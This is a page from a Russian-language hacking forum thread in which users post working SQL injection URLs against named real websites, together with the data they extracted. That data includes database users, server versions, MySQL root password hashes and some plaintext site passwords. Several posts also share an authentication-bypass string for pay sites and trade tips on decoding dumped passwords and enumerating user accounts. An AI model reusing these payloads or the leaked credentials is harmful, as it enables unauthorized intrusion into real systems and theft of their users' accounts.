ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3801  
Старый 23.11.2007, 22:10
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию

Код:
http://www.adapt.org/adaptpr/index.php?mode=P&id=-253+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7/*
www@localhost::archives::4.0.12-max
Код:
http://www.troc-velo.com/index.php?mode=1&annonce=-46890+union+select+concat_ws(char(58,58),user(),database(),version()),2,3,4/*
webmaster@web.planet-work.net::webmaster::5.0.32-Debian_7etch1-l
89 таблиц
 
Ответить с цитированием

  #3802  
Старый 23.11.2007, 23:41
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

www.kromestudios.com

4.1.11-Debian_4sarge5-log

Код:
http://www.kromestudios.com/games/overview.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+--+
root:3da66bb67d498077
root:*33674D9ADE349AFD9256D9D109447C6F0540E387
:*33674D9ADE349AF
webmaster:0e1c10731366477a
web_bushrescue:76b68e694c41cbd4
sdb:273ff1036ed30d3f
kromeweb:772deb3439d64f29
web_bushrescue:
NOTQ:772deb3439d64f29
andygreen:7ca4c29d7375760c
kromeweb:*C8B0D9F346E669563013B3830EDB947F940930D9
 
Ответить с цитированием

  #3803  
Старый 24.11.2007, 02:03
VERte][
Moderator - Level 7
Регистрация: 17.05.2007
Сообщений: 220
Провел на форуме:
3013539

Репутация: 441
По умолчанию

http://www.hardxxxniche.com/reg.html
поле ввода кода:
123' or '5'='5
качаем на халяву))))))))))))

http://www.xxx-sexi.com ещё один=)
внизу первого сайта есть список рекомендумых сайтов, ходим по ним и ищем, что надо)))

Последний раз редактировалось Vertexe; 24.11.2007 в 02:06..
 
Ответить с цитированием

  #3804  
Старый 24.11.2007, 05:52
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.zonewm.biz/showasf.php?id=4+union+select+1,version(),3,concat_ws(0x2F,id,pass),5,6,7,8,9+from+user/*
version: 4.1.22-standard-log

тока password т.к логины не подобрать

7252112e9937463288df35cc14b2cf74
4e8fed7ffd3b44ae492f8d306afff552
7252112e9937463288df35cc14b2cf74
 
Ответить с цитированием

  #3805  
Старый 24.11.2007, 06:36
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://axxl.ru/?module=do&part=full&id=-15976+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
Version : 4.1.21/db_axxler_4/dbu_axxler_2@192.168.3.77
 
Ответить с цитированием

  #3806  
Старый 24.11.2007, 06:55
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.rating.vn.ua/stats.php?uid1=-489+union+select+1,version(),concat_ws(0x2F,id,name,password)+from+sites+limit+2,2/*
Version :5.0.15-standard

Типа что то связанное с админкой реклам...

ID сайт пароль

3/Сайт болельщиков ФК "Нива" Винница/hEaWFG
1/Рейтинг винницких сайтов/ifhsuby
 
Ответить с цитированием

  #3807  
Старый 24.11.2007, 14:35
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

www.seagullmag.com
Американский журнал на русском языке «Чайка» (Seagull magazine)
Код:
http://www.seagullmag.com/article.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+
5.0.45:seagullmag@localhost:seagullmag
Код:
http://www.seagullmag.com/article.php?id=-1+union+select+1,concat(table_schema,0x3a,table_name),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
seagullmag_forum:ibf_forums
Код:
http://www.seagullmag.com/article.php?id=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_schema=0x73656167756C6C6D61675F666F72756D+and+table_name=0x6962665F666F72756D73+limit+0,1+--+
id
name
password
Код:
http://www.seagullmag.com/article.php?id=-1+union+select+1,concat_ws(0x3a,id,name,password,description),3,4,5,6,7,8,9,10,11+from+seagullmag_forum.ibf_forums+limit+1,1+--+
Плюется чем-то очень страшным, вот пример первой записи:
-81:"Чайка" #22(81) от 15 ноября 2006 г.:
Пробовал так:
Код:
AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)
и так:
Код:
convert(paasword+using+latin1)
Не помголо (
 
Ответить с цитированием

  #3808  
Старый 24.11.2007, 15:34
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Unhappy

Код:
http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
я в этом деле новичок
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?
 
Ответить с цитированием

  #3809  
Старый 24.11.2007, 15:57
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

ZAMUT
Это utf8. Пробуй convert(something+using+utf8)
 
Ответить с цитированием

  #3810  
Старый 24.11.2007, 16:59
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+TOP+1+Email+FROM+vwWebUsers+WHERE+id='1')--
В качестве логина используется мыло, пароли в колонке PWD, далее увеличивая id перебираем всех пользователей
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ